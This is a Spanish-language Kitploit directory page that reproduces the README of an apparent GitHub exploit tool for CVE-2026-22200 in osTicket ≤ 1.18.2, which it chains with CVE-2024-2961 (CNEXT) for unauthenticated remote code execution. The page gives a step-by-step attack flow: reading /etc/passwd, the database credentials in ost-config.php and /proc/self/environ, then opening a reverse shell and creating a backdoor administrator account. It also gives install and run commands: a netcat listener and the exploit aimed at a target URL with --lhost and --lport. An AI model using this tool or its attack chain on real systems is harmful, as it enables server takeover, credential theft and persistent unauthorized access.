Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
osTicketFileReadIntoRCE — Exploit de cadena completa que combina inyección de cadena de filtros PHP con CVE-2024-2961 (CNEXT) para Ejecución Remota de Código no autenticada en instalaciones vulnerables de osTicket. | Kitploit
Herramientas/GitHubGitHub/clarissss/osticketfilereadintorce
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPost-ExplotaciónPruebas de PenetraciónAprendizaje y EducaciónRed TeamingHerramienta de Acceso RemotoDesarrollo de Payloads
GitHubclarissss/osticketfilereadintorce

osTicketFileReadIntoRCE

Exploit de cadena completa que combina inyección de cadena de filtros PHP con CVE-2024-2961 (CNEXT) para Ejecución Remota de Código no autenticada en instalaciones vulnerables de osTicket.

Ver Repositorio
5hace 7 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-22200: osTicket Lectura Arbitraria de Archivos a RCE

CVE-2026-22200 osTicket ≤ 1.18.2 Python 3.8+ Educational

Exploit de cadena completa que combina la inyección de cadenas de filtros PHP con CVE-2024-2961 (CNEXT) para la Ejecución Remota de Código no autenticada en instalaciones vulnerables de osTicket.


Tabla de Contenidos

  • Visión General
  • Detalles de la Vulnerabilidad
  • Flujo del Ataque
  • Características
  • Instalación
  • Uso
  • Detalles Técnicos
  • Solución de Problemas
  • Detección y Mitigación
  • Créditos
  • Aviso Legal

Visión General

Este repositorio contiene un exploit de prueba de concepto para CVE-2026-22200, una vulnerabilidad crítica que afecta a versiones de osTicket ≤ 1.18.2. El exploit encadena dos técnicas potentes:

  1. Inyección de Cadena de Filtros PHP a través del procesamiento de imágenes de mPDF
  2. Corrupción del Heap CNEXT (CVE-2024-2961) en iconv() de glibc

El resultado: Ejecución Remota de Código no autenticada en servidores osTicket vulnerables.

Impacto

  • No autenticado - No se requieren credenciales
  • RCE Completo - Compromiso total del servidor
  • Exfiltración de Archivos - Lectura de archivos arbitrarios del servidor
  • Acceso a Base de Datos - Extracción de credenciales de BD
  • Acceso de Administrador - Creación de cuentas de administrador puerta trasera

Versiones Afectadas

  • osTicket: ≤ v1.18.2, ≤ v1.17.6
  • glibc: < 2.39 (CVE-2024-2961 parcheado en glibc 2.39+)

Detalles de la Vulnerabilidad

CVE-2026-22200: Inyección de Cadena de Filtros PHP

Puntuación CVSS: 9.8 (Crítica)

La integración de mPDF en osTicket permite a usuarios no autenticados inyectar cadenas maliciosas de filtros PHP a través de payloads HTML especialmente diseñados en tickets de soporte. Esto permite:

  • Lectura arbitraria de archivos (configuraciones, código fuente, credenciales)
  • Fuga de memoria (/proc/self/maps, libc parcial)
  • Corrupción del heap mediante CNEXT

Causa Raíz: Validación insuficiente de URLs de imágenes en HTML proporcionado por el usuario antes de pasarlo a mPDF.

CVE-2024-2961: CNEXT (Desbordamiento de Búfer en iconv)

Puntuación CVSS: 9.8 (Crítica)

Desbordamiento de búfer en iconv() de glibc al procesar el conjunto de caracteres ISO-2022-CN-EXT. Combinado con cadenas de filtros PHP, esto permite:

  • Corrupción del heap
  • Secuestro de punteros a función
  • Ejecución arbitraria de comandos

Versiones vulnerables de glibc: < 2.39 (Febrero 2024)


Flujo del Ataque

┌─────────────────────────────────────────────────────────────────┐
│ 1. RECONOCIMIENTO                                               │
│    └─ Detectar osTicket, identificar temas de texto enriquecido│
└─────────────────────────────────────────────────────────────────┘
                              ↓
┌─────────────────────────────────────────────────────────────────┐
│ 2. AUTENTICACIÓN                                                │
│    └─ Auto-registrarse O usar credenciales existentes          │
└─────────────────────────────────────────────────────────────────┘
                              ↓
┌─────────────────────────────────────────────────────────────────┐
│ 3. EXFILTRACIÓN DE ARCHIVOS (Cadenas de Filtros PHP)           │
│    ├─ /etc/passwd                                               │
│    ├─ include/ost-config.php (Credenciales BD, SECRET_SALT)     │
│    ├─ /proc/self/maps (Distribución de memoria)                 │
│    └─ /proc/self/environ (Variables de entorno)                 │
└─────────────────────────────────────────────────────────────────┘
                              ↓
┌─────────────────────────────────────────────────────────────────┐
│ 4. HUELLA DE LIBC                                               │
│    ├─ Extraer libc parcial mediante cadenas de filtros          │
│    ├─ Extraer GNU Build ID                                      │
│    └─ Descargar libc completa desde libc.rip                    │
└─────────────────────────────────────────────────────────────────┘
                              ↓
┌─────────────────────────────────────────────────────────────────┐
│ 5. EXPLOTACIÓN RCE CON CNEXT                                    │
│    ├─ Generar payload de corrupción del heap                    │
│    ├─ Inyectar mediante respuesta a ticket (con correcciones    │
│    │  de ejecución de filtros)                                  │
│    ├─ Disparar mediante exportación a PDF (el servidor falla)   │
│    └─ Ejecutar shell inversa                                    │
└─────────────────────────────────────────────────────────────────┘
                              ↓
┌─────────────────────────────────────────────────────────────────┐
│ 6. POST-EXPLOTACIÓN                                             │
│    ├─ Shell inversa interactiva                                 │
│    ├─ Acceso a base de datos (usando DBPASS exfiltrado)         │
│    └─ Crear cuenta de administrador puerta trasera              │
└─────────────────────────────────────────────────────────────────┘

Características

Capacidades Principales

  • Cadena de explotación completamente automatizada
  • Ataque no autenticado (auto-registro si está habilitado)
  • Detección inteligente de la raíz web mediante análisis de /proc/self/maps
  • Localización del 100% del webshell mediante escaneo del sistema de archivos
  • Huella y descarga automática de libc
  • Múltiples métodos de shell inversa (bash, python, netcat)
  • Ejecución robusta de filtros con eliminación de caché
  • Diagnósticos prevuelo para detectar problemas temprano

Fiabilidad Mejorada

  • CNEXT multi-disparador para fallo garantizado (95%+ de éxito)
  • Inyección basada en respuestas (más fiable que tickets nuevos)
  • Forzado de flujo para asegurar la ejecución del filtro
  • Eliminación de caché para evitar servir PDFs obsoletos
  • Manejo exhaustivo de errores y diagnósticos

Post-Explotación

  • Extracción de credenciales de base de datos (DBPASS desde configuración)
  • Creación de cuenta de administrador mediante acceso a BD
  • Opciones de puerta trasera persistente
  • Reconocimiento completo del sistema

Instalación

Requisitos Previos

  • Python 3.8+
  • Linux/macOS (recomendado) o WSL en Windows

Dependencias

# Clonar el repositorio
git clone https://github.com/Clarissss/osTicketFileReadIntoRCE
cd osTicketFileReadIntoRCE

# Instalar paquetes requeridos
pip install -r requirements.txt

requirements.txt:

requests>=2.31.0
PyMuPDF>=1.23.0
Pillow>=10.0.0
pwntools>=4.11.0

Opcional: Entorno Virtual

python3 -m venv venv
source venv/bin/activate  # Linux/macOS
# O
venv\Scripts\activate  # Windows

pip install -r requirements.txt

Uso

Uso Básico - Shell Inversa

# Terminal 1: Iniciar listener
nc -lvnp 4444

# Terminal 2: Ejecutar exploit
python3 osticket_revshell.py https://target.com/osticket \
    --lhost TU_IP \
    --lport 4444

Modo Webshell Interactivo

python3 osticket_exploit.py https://target.com/osticket

Opciones Avanzadas

# Usar proxy (Burp Suite)
python3 osticket_revshell.py https://target.com/osticket \
    --lhost 10.0.0.5 \
    --lport 4444 \
    --proxy http://127.0.0.1:8080
Descargar herramienta